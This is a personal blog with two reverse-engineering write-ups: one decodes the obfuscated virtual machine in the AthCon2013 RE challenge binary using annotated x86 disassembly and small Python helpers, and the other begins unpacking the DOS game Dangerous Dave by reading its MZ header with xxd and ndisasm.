Dany's 'blog

Monday, June 17, 2013

AthCon2013 RE challenge - part 1

Just came back from AthCon2013, where the organizers were generous enough to give me a free ticket for solving this year's reverse-engineering challenge.
In all fairness, I was not the first to solve the challenge, but a mere 3rd. I'll try to find the names of all the people who solved the challenge and post them here.
The challenge was written by Kyriakos Economou & Nikolaos Tsapakis (check out their blog "The A.R.F. Project"), great job guys!
For anyone who's interested in following the writeup with the challenge at hand, or in just giving it a go yourself, it's available here.
As the challenge was a fairly interesting one, I thought I'd post a writeup.

SPOILER ALERT!!!

On running the EXE, you are greeted with a console window:

Which after closing, presents you with the following message-box containing the "bad-boy" message:

Inside the EXE, at the entry point (0x40107B) we find two function calls:

func@402CBC - This is the function that opens the console window and displays the greeting. Not very interesting.
func@401086 - Triggers a jump to 0x407730, where the real program starts.

So let's start dissecting that program:

00407730    pushf
00407731    push    esi  
00407732    call    $+5  
00407737    pop     esi  
00407738    sub     esi, 2Fh     
0040773B    push    eax  
0040773C    mov     eax, ebx     
0040773E    pop     dword ptr [esi]
00407740    add     eax, 24h     
00407743    push    ebx  
00407744    mov     ebx, ecx     
00407746    pop     dword ptr [esi+4]
00407749    add     ebx, 20h     
0040774C    push    ecx  
0040774D    mov     ecx, edx     
0040774F    pop     dword ptr [esi+8]
00407752    add     ecx, 8
00407755    push    edx  
00407756    mov     edx, esi     
00407758    pop     dword ptr [esi+0Ch]
0040775B    add     edx, 4
0040775E    mov     eax, esi     
00407760    push    eax  
00407761    pop     ebx  
00407762    pop     dword ptr [eax+10h]
00407765    add     ebx, 0Ch     
00407768    pop     dword ptr [esi+20h]
0040776B    push    edi  
0040776C    add     edi, eax     
0040776E    pop     dword ptr [eax+14h]
00407771    add     edi, 10h     
00407774    push    ebp  
00407775    add     ebp, edi     
00407777    pop     dword ptr [eax+18h]
0040777A    add     edi, 18h     
0040777D    push    esp  
0040777E    add     edi, 4
00407781    pop     dword ptr [eax+1Ch]
00407784    add     esi, 18h     
00407787    call    $+5  
0040778C    pop     edi  
0040778D    sub     edi, 18Ch    
00407793    mov     esi, [edi]   
00407795    xor     edi, edi     
00407797    mov     [eax+24h], esi

This (slightly obfuscated) code appears to save all the registers to 0x407708 through 0x40772C. Let's name these addresses:

0x407708: _eax
0x40770C: _ebx
0x407710: _ecx
0x407714: _edx
0x407718: _esi
0x40771C: _edi
0x407720: _ebp
0x407724: _esp
0x407728: _eflags
0x40772C: _blob_ptr, contains the value 0x40CADE, which is an address to some binary data (tried disassembling - not code) within the EXE

0040779A    sub     esp, 800h    
004077A0    call    $+5  
004077A5    pop     edi  
004077A6    sub     edi, 79h     
004077A9    jmp     short @0x4077AC

This just loads edi with &_blob_ptr and jumps to 0x4077AC.
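The call $+5 / pop / add-or-sub idiom shows up again and again in this binary, so it helps to have a quick way to double-check the addresses it produces. Here is a minimal Python sketch; the helper name resolve_call_pop is my own and not something from the challenge:

```python
def resolve_call_pop(call_addr: int, delta: int) -> int:
    """Value left in the register after `call $+5; pop reg; add/sub reg, N`.

    `call $+5` is 5 bytes long, so it pushes call_addr + 5 (the address of
    the pop that follows). Pass a negative delta for a `sub`.
    """
    return (call_addr + 5 + delta) & 0xFFFFFFFF


# Both examples are taken from the listings above.
print(hex(resolve_call_pop(0x407732, -0x2F)))  # 0x407708, i.e. _eax
print(hex(resolve_call_pop(0x4077A0, -0x79)))  # 0x40772c, i.e. &_blob_ptr
```

The same helper can be applied to every later call $+5 in the listings.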

004077AC    mov     edi, [edi]      
004077AE    call    $+5  
004077B3    pop     esi             
004077B4    add     esi, 28C1h      
004077BA    xor     ebx, ebx        
004077BC    mov     ebp, esp        
004077BE    mov     ecx, edi        
004077C0    add     ecx, ebx     
004077C2    mov     esp, ecx        
004077C4    pop     edx             
004077C5    mov     esp, ebp        
004077C7    mov     ebp, esp     
004077C9    mov     ecx, esi        
004077CB    add     ecx, ebx     
004077CD    mov     esp, ecx        
004077CF    pop     ecx             
004077D0    mov     cl, dl
004077D2    push    ecx             
004077D3    mov     esp, ebp     
004077D5    inc     ebx  
004077D6    push    ebx  
004077D7    xor     ebx, 0Fh     
004077DA    pop     ebx  
004077DB    jz      short @0x4077DF
004077DD    jmp     short @0x4077BC
004077DF    ...

This is basically a loop (again, obfuscated, and I'll stop mentioning it now, as all the code is obfuscated) which copies 15 bytes (ebx counts from 0 until it reaches 0xF) from the address in _blob_ptr to 0x40A074. Also, remember for later that esi ends up being set to 0x40A074, and this register will remain unchanged throughout the code.
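To convince myself of what the stack-pivoting loop really does, here is a rough Python emulation. It is only a sketch: memory is a toy bytearray, and the offsets 0 and 32 stand in for the real bytecode and 0x40A074.

```python
import struct


def copy_to_staging(mem: bytearray, blob_ptr: int, staging: int) -> None:
    """Mimic the loop at 0x4077BC, which moves one byte per iteration.

    Each round reads a dword at blob_ptr + i (esp is pointed there, then
    `pop edx`), reads a dword at staging + i, replaces its low byte with dl
    and writes the dword back (`push ecx`).
    """
    i = 0
    while True:
        (edx,) = struct.unpack_from("<I", mem, blob_ptr + i)
        (ecx,) = struct.unpack_from("<I", mem, staging + i)
        ecx = (ecx & 0xFFFFFF00) | (edx & 0xFF)        # mov cl, dl
        struct.pack_into("<I", mem, staging + i, ecx)
        i += 1                                         # inc ebx
        if (i ^ 0x0F) == 0:                            # xor ebx, 0Fh / jz
            break


mem = bytearray(64)
mem[0:20] = bytes(range(1, 21))        # pretend bytecode
copy_to_staging(mem, blob_ptr=0, staging=32)
print(mem[32:48].hex())
```

Only the low byte of each dword changes, so the net effect is a plain byte-by-byte copy that stops once the counter hits 0xF.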

004077DF    mov     ebp, esp     
004077E1    mov     edi, esi     
004077E3    mov     esp, edi     
004077E5    pop     ebx  
004077E6    mov     esp, ebp     
004077E8    mov     cl, bl
004077EA    mov     ebp, esp     
004077EC    mov     edi, esi     
004077EE    inc     edi  
004077EF    mov     esp, edi     
004077F1    pop     ebx  
004077F2    mov     esp, ebp     
004077F4    mov     bh, bl
004077F6    mov     bl, cl
004077F8    call    $+5  
004077FD    pop     edi  
004077FE    sub     edi, 0D1h    
00407804    xor     bl, 8Ah

This loads the first two bytes at 0x40A074 into bl and bh, and XORs bl with 0x8A.
Also, note that edi now points to _blob_ptr.
OK, let's see what comes next:

00407807    push    ebx
00407808    pop     ecx
00407809    push    ecx
0040780A    xor     cl, 1Fh
0040780D    pushf
0040780E    add     al, 4
00407810    xor     al, 18h
00407812    pop     edx
00407813    pop     ebx
00407814    and     edx, 40h
00407817    jnz     short @0x407822

This is just a fancy way to check whether bl - i.e. the byte at 0x40A074 - i.e. the byte at _blob_ptr, XORed with 0x8A is equal to 0x1F. Let's follow that path:

00407822    push    ebx  
00407823    pop     ecx  
00407824    push    ecx  
00407825    xor     ch, 0E0h     
00407828    pushf
00407829    add     al, 4
0040782B    xor     al, 18h
0040782D    pop     edx  
0040782E    pop     ebx  
0040782F    and     edx, 40h     
00407832    jnz     @0x40A7FF

Now ch - i.e. bh - i.e. the second byte at 0x40A074 - i.e. the byte at _blob_ptr+1, is compared to 0xE0. Again, we swallow the bait:

0040A7FF    mov     edx, [edi-24h]
0040A802    push    eax  
0040A803    push    ebx  
0040A804    push    ecx  
0040A805    pop     ecx  
0040A806    pop     ebx  
0040A807    pop     eax  
0040A808    mov     [edi], edx   
0040A80A    jmp     @0x40A0CD

Ah, finally something interesting. Remember edi points to _blob_ptr? Well, that means edi-0x24 points to _eax! And this piece of code copies _eax to _blob_ptr.
The jump takes us here:

0040A0CD    mov     ebx, eax     
0040A0CF    sub     ecx, 10h     
0040A0D2    sub     edx, 14h     
0040A0D5    add     esp, 400h    
0040A0DB    sub     esi, 18h     
0040A0DE    add     esp, 400h    
0040A0E4    sub     edi, 1Ch     
0040A0E7    jmp     @0x40779A

This code basically does nothing, and if we follow the jump, we loop back to 0x40779A, right after the register-saving code where we started.
Interesting...let's try to take a look at another piece of code, supposing we took a different branch on the byte at _blob_ptr:

00407819    xor     cl, al
0040781B    pushf
0040781C    pop     edx  
0040781D    and     dl, 40h
00407820    jmp     0x40783F     
            ...
0040783F    push    ebx  
00407840    pop     ecx  
00407841    push    ecx  
00407842    xor     cl, 6Dh
00407845    pushf
00407846    add     al, 4
00407848    xor     al, 18h
0040784A    pop     edx  
0040784B    pop     ebx  
0040784C    and     edx, 40h     
0040784F    jnz     0x40785A     
            ...
0040785A    push    ebx  
0040785B    pop     ecx  
0040785C    push    ecx  
0040785D    xor     ch, 1
00407860    pushf
00407861    add     al, 4
00407863    xor     al, 18h
00407865    pop     edx  
00407866    pop     ebx  
00407867    and     edx, 40h     
0040786A    jnz     0x40A80F
            ...
0040A80F    mov     eax, [edi-4] 
0040A812    mov     ebx, [edi]   
0040A814    add     ebx, 2
0040A817    mov     cl, [ebx]    
0040A819    mov     edx, [edi-24h]
0040A81C    push    eax  
0040A81D    popf
0040A81E    shr     edx, cl
0040A820    pushf
0040A821    pop     edx  
0040A822    mov     [edi-4], edx 
0040A825    mov     [edi-24h], edx
0040A828    mov     eax, [edi]   
0040A82A    add     eax, 3
0040A82D    mov     [edi], eax   
0040A82F    jmp     0x40A0CD (go_to_start)

So, just to be on the same page, the path I took was:

_blob_ptr[0] ^ 0x8A != 0x1F
_blob_ptr[0] ^ 0x8A == 0x6D
_blob_ptr[1] == 0x01

And this brings us to that last piece of code. Again, remember edi = &_blob_ptr, this makes the code equivalent to:

eflags = _eflags;
edx = _eax;
edx >>= _blob_ptr[2];
_eflags = eflags;
_eax = edx;
_blob_ptr += 3;

Ahhh, so basically, _eax is SHRed by the byte at _blob_ptr[2], and then _blob_ptr is advanced by 3, which is just the number of bytes we just processed. This looks exactly as if those 3 bytes just defined a SHR instruction.
This is our moment of clarity.
All the underscored registers are actually a VM's register state, where _blob_ptr is the VM's eip, the BLOB is the bytecode, and the entire code we saw so far is a single instruction cycle.
Now that we know the name and role of all the variables and locations, we can decode all the instructions (there are quite a few of them and it takes a lot of patience; you can find the complete list in my GitHub repository).
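To make the idea concrete, here is a minimal Python sketch of one VM cycle covering only the two handlers decoded so far. It is an illustration under assumptions, not the challenge's code: the register file is a plain dict, eip is treated as an offset into a bytes object rather than a real address, and the flag handling is left out entirely.

```python
KEY = 0x8A  # the first byte of each VM instruction is XORed with this


def vm_step(regs: dict, bytecode: bytes) -> None:
    """Run one cycle for the two handlers decoded so far (flags ignored)."""
    ip = regs["eip"]
    selector = bytecode[ip] ^ KEY
    second = bytecode[ip + 1]
    if selector == 0x1F and second == 0xE0:
        # Handler at 0x40A7FF: the VM's eip is overwritten with _eax.
        regs["eip"] = regs["eax"]
    elif selector == 0x6D and second == 0x01:
        # Handler at 0x40A80F: shift _eax right, then skip the 3 bytes used.
        count = bytecode[ip + 2] & 0x1F  # x86 masks 32-bit shift counts to 5 bits
        regs["eax"] = (regs["eax"] & 0xFFFFFFFF) >> count
        regs["eip"] = ip + 3
    else:
        raise NotImplementedError(f"selector {selector:#04x} not decoded yet")


regs = {"eax": 0x100, "eip": 0}
vm_step(regs, bytes([0x6D ^ KEY, 0x01, 0x04]))
print(regs)  # {'eax': 16, 'eip': 3}
```

Every other handler would become one more branch of the same shape: match on the selector bytes, touch the VM registers, advance eip.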
However, even if we do that, there's a small catch. Let's take a look at this little condition right there in the middle of the VM's switch:

0040803B    jnz     0x40BD7B ; PUSH IMM8 (with sign extend)
00408041    xor     cl, al
00408043    pushf 
00408044    pop     edx   
00408045    and     dl, 40h
00408048    push    ebx   
00408049    mov     ebx, [edi] 
0040804B    add     ebx, 1200h 
00408051    mov     bl, [ebx] 
00408053    cmp     bl, 1 
00408056    jnz     0x408145

This extra condition looks at *(vm_eip+0x1200). If it's 1, then we just continue with the switch. However, if it's 0, then we go to some special handling. One important thing to note before we continue is that the bytecode is probably 0x1200 bytes long. The jump target is also the "default" handler for the switch statement.

00408145    pop     ebx  
00408146    xor     bl, 8Ah
00408149    call    $+5  
0040814E    pop     eax  
0040814F    sub     eax, 0B46h   
00408154    xor     ecx, ecx     
          loop:
00408156    mov     ebp, esp     
00408158    mov     edi, eax     
0040815A    mov     esp, edi     
0040815C    pop     edx  
0040815D    mov     esp, ebp     
0040815F    cmp     bl, dl
00408161    jz      0x408167
00408163    inc     ecx  
00408164    inc     eax  
00408165    jmp     0x408156 (loop)

So we take vm_eip[0]^0x8A, and XOR it with 0x8A again, so we are left with vm_eip[0] in bl.
Next, we scan what appears to be a 256-byte table at 0x407608 for vm_eip[0], and store the index in ecx.

00408167    mov     ebp, esp
00408169    mov     eax, esi
0040816B    mov     esp, eax
0040816D    pop     eax
0040816E    mov     al, cl
00408170    push    eax
00408171    mov     esp, ebp

If we recall that esi points to the area to which those 15 bytes were copied from the bytecode, we see that the first byte is replaced by the index found in the previous loop. In effect, the first byte of the current opcode is passed through a map.
Let's just call this area with the 15 bytes of bytecode the staging area.
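The mask test and the opcode translation can be sketched together in Python. This is a simplified model with made-up data: the blob is assumed to be the bytecode followed by its mask bytes 0x1200 further on, and opcode_table is a stand-in for the real table at 0x407608, whose contents are not reproduced here.

```python
BYTECODE_LEN = 0x1200   # distance from an instruction to its mask byte
STAGING_LEN = 15        # bytes copied to the staging area each cycle


def takes_default_path(blob: bytes, vm_ip: int) -> bool:
    """Mirror `cmp bl, 1 / jnz`: anything other than 1 goes to the default."""
    return blob[vm_ip + BYTECODE_LEN] != 1


def stage_native(blob: bytes, vm_ip: int, opcode_table: bytes) -> bytearray:
    """Copy the bytes to a staging buffer and translate the first one."""
    staging = bytearray(blob[vm_ip:vm_ip + STAGING_LEN])
    # The loop at 0x408156 is a linear scan: the translated opcode is the
    # index of the first table entry equal to the byte from the bytecode.
    staging[0] = opcode_table.index(staging[0])
    return staging


# Toy data: a reversed identity table, so value v sits at index 255 - v.
table = bytes(reversed(range(256)))
blob = bytearray(2 * BYTECODE_LEN)
blob[0:3] = bytes([0x6F, 0x11, 0x22])
staged = stage_native(bytes(blob), 0, table)
print(takes_default_path(bytes(blob), 0), hex(staged[0]))
```

Note that the real scan has no bounds check; a byte that is missing from the table would simply run off its end.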

00408173    call    $+5
00408178    pop     eax
00408179    add     eax, 1E4Bh ; eax = 0x409FC3
0040817E    push    0
00408180    push    esi
00408181    push    eax
00408182    push    ebp
00408183    sub     esp, 27h
00408186    mov     ebp, esp
00408188    push    ecx
00408189    push    edx
0040818A    push    esi
0040818B    call    0x409210

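The stack is prepared so that when entering the function at 0x409210, the stack would look like this (offsets are relative to ebp and follow from the pushes above):

ebp-0x10: return address (the address right after the call)
ebp-0x0C: saved esi
ebp-0x08: saved edx
ebp-0x04: saved ecx
ebp+0x00: 0x27 bytes of scratch space
ebp+0x27: saved ebp
ebp+0x2B: code_ptr1 = 0x409FC3
ebp+0x2F: pointer to the staging area
ebp+0x33: 0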

Now, armed with this visual aid, we can take a look at the function at 0x409210:

00409210    pop     esi
00409211    push    dword ptr [ebp+2Fh]
00409214    pop     dword ptr [ebp+23h]
00409217    mov     byte ptr [ebp+22h], 0
0040921B    mov     dword ptr [ebp+2], 20h
00409222    mov     dword ptr [ebp+6], 20h
00409229    cmp     dword ptr [ebp+33h], 40h
0040922D    jnz     0x409236 (label1)
0040922F    mov     dword ptr [ebp+6], 40h
00409236 label1:
00409236    mov     eax, [ebp+23h]
00409239    movzx   ecx, byte ptr [eax]
0040923C    lea     eax, [esi+ecx*4]
0040923F    add     eax, [eax]
00409241    add     eax, 4
00409244    call    eax
00409246    cmp     eax, 0FFFFFFFFh
00409249    jz      0x409251 (label2)
0040924B    mov     eax, [ebp+23h]
0040924E    sub     eax, [ebp+2Fh]
00409251 label2:
00409251    pop     esi
00409252    pop     edx
00409253    pop     ecx
00409254    add     esp, 27h
00409257    pop     ebp
00409258    retn    8

That tangle of code, actually does something very simple. I'll break it down:

Note that ebp+0x33 contains 0, which means that the first branch will always be taken.
esi swallows the function's return address.
The first push-pop pair puts the staging area's pointer in ebp+0x23.
The first byte in the staging area then serves as an index to some function table that starts at esi - now the address right after the current function's call.
On a return value different from -1 (which I can only imagine to be a failure of the looked-up function), eax will contain the difference between the values at ebp+0x23 and ebp+0x2F (Odd... didn't we say they contain the same value?)
Finally, the stack is unwound in a way, that on executing ret, the flow returns to code_ptr1=0x409FC3.
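The table lookup in the middle of that function is worth spelling out, because the entries are not absolute addresses but offsets relative to the entry itself. Below is a small Python sketch of the arithmetic; the table contents in the example are invented for illustration, since the real table is not listed in this post.

```python
import struct


def handler_address(table_addr: int, table: bytes, index: int) -> int:
    """Target of `call eax` for a given table index.

    lea eax, [esi+ecx*4]  -> address of the entry
    add eax, [eax]        -> plus the dword stored in the entry
    add eax, 4            -> plus 4
    """
    entry_addr = table_addr + 4 * index
    (relative,) = struct.unpack_from("<I", table, 4 * index)
    return (entry_addr + relative + 4) & 0xFFFFFFFF


# Invented three-entry table located at 0x1000.
toy_table = struct.pack("<3I", 0x100, 0, 0xFFFFFFF0)
print(hex(handler_address(0x1000, toy_table, 0)))  # 0x1104
print(hex(handler_address(0x1000, toy_table, 2)))  # 0xffc
```

Storing relative offsets keeps the table position-independent, which fits the call $+5 style used everywhere else in the binary.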

The only visible side effects are whatever the function at the table did, and the result stored in eax. I have a feeling the two are connected.
So we have two questions now: 1) What's at 0x409FC3? and 2) What do the functions in that table do?
Starting with the second question, I'll pick for example the 5th entry in the table: 0x409308.

00409308    add     dword ptr [ebp+23h], 2
0040930C    retn

Well, combined with what we know the previous function does, this just results in eax containing 2 when the program's flow continues at 0x409FC3:

00409FC3    call    $+5
00409FC8    pop     edi
00409FC9    add     edi, 0ACh

Now edi points to the staging area.

00409FCF    xor     ecx, ecx
00409FD1    mov     ecx, 0Fh
00409FD6    sub     ecx, eax
00409FD8    sub     ecx, 2
00409FDB    add     edi, eax

Advance edi by look_up_func_result. And load ecx with 15-look_up_func_result-2.

00409FDD    push    ebx
00409FDE    mov     ebp, esp
00409FE0    mov     ebx, edi
00409FE2    mov     esp, ebx
00409FE4    pop     ebx
00409FE5    mov     bl, 0EBh
00409FE7    push    ebx

Store 0xEB at staging_area+look_up_func_result.

00409FE8    mov     esp, ebp
00409FEA    pop     ebx
00409FEB    push    ebx
00409FEC    mov     ebp, esp
00409FEE    mov     ebx, edi
00409FF0    inc     ebx
00409FF1    mov     esp, ebx
00409FF3    pop     ebx
00409FF4    mov     bl, cl
00409FF6    push    ebx

And store 15-look_up_func_result-2 at staging_area+look_up_func_result+1.
Very weird, let's see where this is going.

00409FF7    mov     esp, ebp
00409FF9    pop     ebx
00409FFA    jmp     0x40A00B (label1)
00409FFC    push    eax
00409FFD    pop     ebx
00409FFE    inc     ebx
00409FFF    push    ecx
0040A000    pop     edx
0040A001    inc     edx
0040A002    push    esi
0040A003    pop     edi
0040A004    inc     edi
0040A005    pop     esi
0040A006    pop     ebx
0040A007    pop     edx
0040A008    pop     eax
0040A009    leave
0040A00A    retn
0040A00B label1:
0040A00B    call    $+5
0040A010    pop     esi
0040A011    sub     esi, 14h
0040A014    add     esi, 0Eh
0040A017    inc     edi
0040A018    add     edi, ecx

So now esi=0x40A00A (which is the retn right before label1), and edi=staging_area+1+look_up_func_result+(15-look_up_func_result-2)=staging_area+14, which is the last byte of the staging area.

0040A01A loop:
0040A01A    push    ebx
0040A01B    mov     ebp, esp
0040A01D    mov     ebx, esi
0040A01F    mov     esp, ebx
0040A021    pop     edx
0040A022    mov     esp, ebp
0040A024    pop     ebx
0040A025    push    ebx
0040A026    mov     ebp, esp
0040A028    mov     ebx, edi
0040A02A    mov     esp, ebx
0040A02C    pop     ebx
0040A02D    mov     bl, dl
0040A02F    push    ebx
0040A030    mov     esp, ebp
0040A032    pop     ebx
0040A033    dec     esi
0040A034    dec     edi
0040A035    dec     cl
0040A037    jz      0x40A03B
0040A039    jmp     0x40A01A (loop)

This just copies backward ecx=15-look_up_func_result-2 bytes from 0x40A00A, to where edi points now in the staging area.

0040A03B    call    $+5
0040A040    pop     edi
0040A041    sub     edi, 2914h
0040A047    add     [edi], eax
0040A049    mov     ebx, [edi-24h]
0040A04C    mov     eax, [edi-24h]
0040A04F    mov     ecx, [edi-20h]
0040A052    mov     ebx, [edi-20h]
0040A055    mov     edx, [edi-14h]
0040A058    mov     ecx, [edi-1Ch]
0040A05B    mov     esi, [edi-0Ch]
0040A05E    mov     edx, [edi-18h]
0040A061    mov     ebp, [edi-8]
0040A064    mov     esi, [edi-14h]
0040A067    mov     ebp, [edi-0Ch]
0040A06A    mov     esp, [edi-8]
0040A06D    push    dword ptr [edi-4]
0040A070    popf
0040A071    mov     edi, [edi-10h]

If we calculate edi, then we'll see it's the address of vm_eip. Now it's easy to see that this just loads all the machine registers from the VM's registers.
And now we come, right in the middle of our program flow, to the staging area (?!).
So let's just pause right here, and try to think what the contents of the staging area should be at this point:

Originally, the staging area had 15 bytes of bytecode.
Then the first byte was translated via some table.
Then some value, X, was calculated based on running a function from some other table.
And then 0xEB and (13-X) were written in the middle.
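The steps above can be put together in a short Python sketch that rebuilds the staging area for a given X. It is an approximation under assumptions: filler stands in for the code bytes ending at 0x40A00A, X is assumed to be at most 13, and the function names are mine.

```python
STAGING_LEN = 15
JMP_REL8 = 0xEB  # x86 opcode for a short jump with an 8-bit displacement


def patch_staging(staging: bytes, length: int, filler: bytes) -> bytearray:
    """Write `jmp rel8` right after the native instruction and pad the rest."""
    out = bytearray(staging[:STAGING_LEN])
    pad = STAGING_LEN - length - 2      # ecx = 15 - X - 2
    out[length] = JMP_REL8
    out[length + 1] = pad               # the jump displacement
    if pad:
        # The loop at 0x40A01A copies `pad` bytes backwards, ending on the
        # last staging byte, so the tail of `filler` lands at the tail here.
        out[length + 2:] = filler[-pad:]
    return out


def jmp_target(length: int, displacement: int) -> int:
    """Offset reached by the jump, relative to the start of the staging area."""
    return length + 2 + displacement    # rel8 counts from the end of the jmp


patched = patch_staging(bytes(range(0x10, 0x1F)), 2, bytes([0xAA] * 20))
print(patched.hex(), jmp_target(2, patched[3]))
```

Whatever X is, the displacement is chosen so that the jump lands on offset 15, the first byte past the staging area, so the filler bytes are never executed.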

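This kind of looks like this (X being the value calculated by the looked-up function):

staging_area+0 to +X-1: the native instruction, with its first byte translated
staging_area+X: 0xEB
staging_area+X+1: 13-X
staging_area+X+2 to +14: the bytes copied backward from 0x40A00A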

Since this is now actually the code that gets executed, we can only guess that what we have here is a native instruction which was "hidden" in the bytecode, followed by 0xEB. If we look at the x86 opcode table, we see that 0xEB is actually the opcode for jmp rel8, and the jump would take us exactly beyond the staging area, right here:

0040A083    push    edi
0040A084    pushf
0040A085    sub     esp, 800h
0040A08B    call    $+5
0040A090    pop     edi
0040A091    sub     edi, 2964h
0040A097    add     esp, 800h
0040A09D    pop     dword ptr [edi-4]
0040A0A0    pop     dword ptr [edi-10h]
0040A0A3    mov     [edi-24h], eax
0040A0A6    mov     eax, [edi-8]
0040A0A9    mov     [edi-20h], ebx
0040A0AC    mov     ebx, [edi-14h]
0040A0AF    mov     [edi-1Ch], ecx
0040A0B2    mov     ecx, [edi-0Ch]
0040A0B5    mov     [edi-18h], edx
0040A0B8    mov     edx, ecx
0040A0BA    mov     [edi-14h], esi
0040A0BD    mov     esi, eax
0040A0BF    mov     [edi-0Ch], ebp
0040A0C2    mov     ebp, [edi-24h]
0040A0C5    mov     [edi-8], esp
0040A0C8    jmp     0x40779A (start_of_vm_cycle)

Which stores the resulting native machine state into the VM's state, and goes on to process the next VM instruction.
Now we understand that the function table is just a crooked way to encode the length of native instructions based on their opcode.
So to summarize:

We have a virtual machine whose state (all the standard registers) is stored from 0x407708 (eax) to 0x40772C (eip).
The VM's bytecode is 0x1200 bytes long and is at 0x40CADE.
In each cycle, 15 bytes of bytecode are copied to a staging area at 0x40A074.
The first byte of the current instruction is XORed with 0x8A, and serves as a switch parameter to the instruction's handler.
At a certain point in the switch, if no match has been found yet, a mask byte corresponding to the current instruction (at current VM eip + 0x1200) is tested to decide whether to continue descending the switch, or to fall through to the default.
The default handler is native execution of the bytecode, but the opcode must first be decoded by looking it up in the table at 0x407608, and the corresponding instruction length is calculated using the function table that follows the call to 0x409210 (the code at 0x409FC3 then patches the staging area).

You can find the disassembler code here, I'm warning you, it ain't pretty, but it gets the job done.
Now we can look at what the machine is trying to do. But that's for next time.

Friday, December 7, 2012

Reverse engineering Dangerous Dave: Packaging

I've been looking to take on a reverse-engineering project, as a means to practice the skill, for quite some time now.

I needed something simple, but not trivial. Old DOS games seemed like a nice option, since they are mostly small and not very complex, yet the challenge will still be real.
Now, Dangerous Dave is one of the most ubiquitous games out there. It has been around since the late 80's, and as such, it should be small enough for me to undertake as a first project.

Opening the file using the freeware version of IDA Pro, I got informed that the file is possibly a packed file. This means I should expect a big lump of data and some bootstrapping code that would unpack that data into executable code.

For the sake of exercise, I want to try tackling the disassembly of the unpacker using freely available tools.

Starting with the EXE header (for additional reference on EXE, a.k.a MZ, file structure you can check out http://www.tavi.co.uk/sdos/exeformat.html).
Let's look at a hex dump of the header:

$ xxd DAVE.EXE |head
0000000: 4d5a 2a01 9600 0000 0200 e31c ffff 3e2a  MZ*...........>*
0000010: 8000 0000 0e00 9812 1c00 0000 4c5a 3931  ............LZ91
0000020: ffff ba4d 252e 8916 3502 b430 cd21 8b2e  ...M%...5..0.!..
0000030: 02ff ff00 8b1e 2c00 8eda a390 008c 068e  ......,.........
0000040: 0089 1ef0 1f8a fc2e a600 e83d 01c4 3e88  ...........=..>.
0000050: feff e4c7 8bd8 b9ff 7ffc f2ae e361 4326  .............aC&
0000060: 38ff e105 75f6 80cd 80f7 d989 0ee5 b901  8...u...........
0000070: ff10 00d3 e383 c308 83e3 f8cb 8cfe 7fc3  ................
0000080: da2b ea8b 3ebe 4b81 ff00 0273 07bf 48ff  .+..>.K....s..H.
0000090: fb89 f3c7 129f 7228 033e ff1f b24b 7222  ......r(.>...Kr"

The fields of interest are:

Header paragraphs = 2
This is where the actual "program" starts in the file, i.e. this is the start of the image that will be loaded into memory by the DOS loader.
Initial CS = 0x1298
This is the segment address where that code will start executing
Initial IP = 0xE
This is the offset within the above segment where the loader will jump once the file has been loaded into memory.

Using these 3 parameters we can calculate the program's entry point as an offset from the start of the EXE file.
One thing to notice though, is that the initial IP is not 0, meaning there might be some data in the code segment.
Anyway, to find the offset of the code segment within the file, we need to skip the header which occupies 2 paragraphs, and an additional CS (=0x1298) paragraphs. Each paragraph is 16 bytes long, resulting in a total offset of 2 * 16 + 0x1298 * 16 = 0x129A0 bytes.
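The same calculation can be done straight from the header bytes. Here is a short Python sketch using the first 0x1C bytes from the hex dump above; the field offsets (0x08, 0x14, 0x16) are the standard MZ header layout, and the function name is just for illustration.

```python
import struct

# First 0x1C bytes of DAVE.EXE, copied from the xxd output above.
HEADER = bytes.fromhex(
    "4d5a2a01960000000200e31cffff3e2a"
    "800000000e0098121c000000"
)
PARAGRAPH = 16


def entry_point(header: bytes) -> tuple:
    """Return (file offset of the code segment, file offset of the entry point)."""
    (header_paragraphs,) = struct.unpack_from("<H", header, 0x08)
    initial_ip, initial_cs = struct.unpack_from("<HH", header, 0x14)
    segment_offset = (header_paragraphs + initial_cs) * PARAGRAPH
    return segment_offset, segment_offset + initial_ip


segment, entry = entry_point(HEADER)
print(hex(segment), hex(entry))  # 0x129a0 0x129ae
```

The second value is where the first real instruction lives, 14 bytes past the start of the code segment.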
To disassemble the code I will use ndisasm, the disassembler that comes with nasm (http://www.nasm.us/). I want to start disassembling at offset 0x129A0 from the start of the file, and skip the first 0xE(=14) (allegedly) data bytes. The former is facilitated by the -e switch, and the latter by specifying a sync point using the -s switch (you can read all about the different switches here) like this:

$ ndisasm -b 16 -e129A0h -sEh DAVE.EXE
00000000  0000              add [bx+si],al
00000002  0000              add [bx+si],al
00000004  80003F            add byte [bx+si],0x3f
...

I will now go over each section I managed to identify in the executable and discuss it in detail.

Packed code

All the data from the 3rd paragraph of the file (the first 2 are the header) up to the start of the code segment, 0x1298 paragraphs in total. This is just one big chunk of data whose composition we do not yet know.

Unpacker data

Remember that there is a non 0 initial IP specified in the header? Well, that's because the first 14 bytes in the code segment are data:

$ xxd DAVE.EXE |grep "129a0"
00129a0: 0000 0000 8000 3f2f 9812 8d17 8a01 060e  ......?/........

The only interesting observation which can be made here is that 9812 looks a lot like a little-endian encoding of 0x1298, which is exactly the size of the packed code in paragraphs, so we can name it: word_0x8 = 0x1298 = packed code paragraphs.
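Reading the 14 bytes as seven little-endian words makes the values easier to spot. A quick Python sketch, with the bytes copied from the xxd line above and the word_<offset> naming following the convention used in this post:

```python
import struct

# The 14 data bytes at file offset 0x129A0, copied from the xxd output above.
UNPACKER_DATA = bytes.fromhex("0000000080003f2f98128d178a01")


def data_words(raw: bytes) -> dict:
    """Map each even offset to the little-endian word stored there."""
    values = struct.unpack("<%dH" % (len(raw) // 2), raw)
    return {2 * i: value for i, value in enumerate(values)}


for offset, value in data_words(UNPACKER_DATA).items():
    print(f"word_{offset:#x} = {value:#06x}")
```

The word at offset 0x8 comes out as 0x1298, matching the observation above; the meaning of the other words only becomes clear from the code that reads them.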

Bootstrapping

This section itself is quite complex, and contains several parts, I will try to divide them logically.

$ ndisasm -b 16 -e129A0h -sEh DAVE.EXE
...
0000000E  06                push es

This line is a bit curious: it pushes es onto the stack. During the loading process, es is loaded with the address of the PSP segment. While the segment contains very interesting system information, the "real" importance of it in this context is that it is the segment of the program's base, because the executable is loaded immediately following the PSP segment. This will be important later, so for now we need to remember that the address of the PSP segment is saved to the stack.

0000000F  0E                push cs
00000010  1F                pop ds
00000011  8B0E0C00          mov cx,[0xc]  ; word_0xc = 0x18a
00000015  8BF1              mov si,cx
00000017  4E                dec si
00000018  89F7              mov di,si
0000001A  8CDB              mov bx,ds
0000001C  031E0A00          add bx,[0xa]  ; word_0xa = 0x178d
00000020  8EC3              mov es,bx
00000022  FD                std
00000023  F3A4              rep movsb

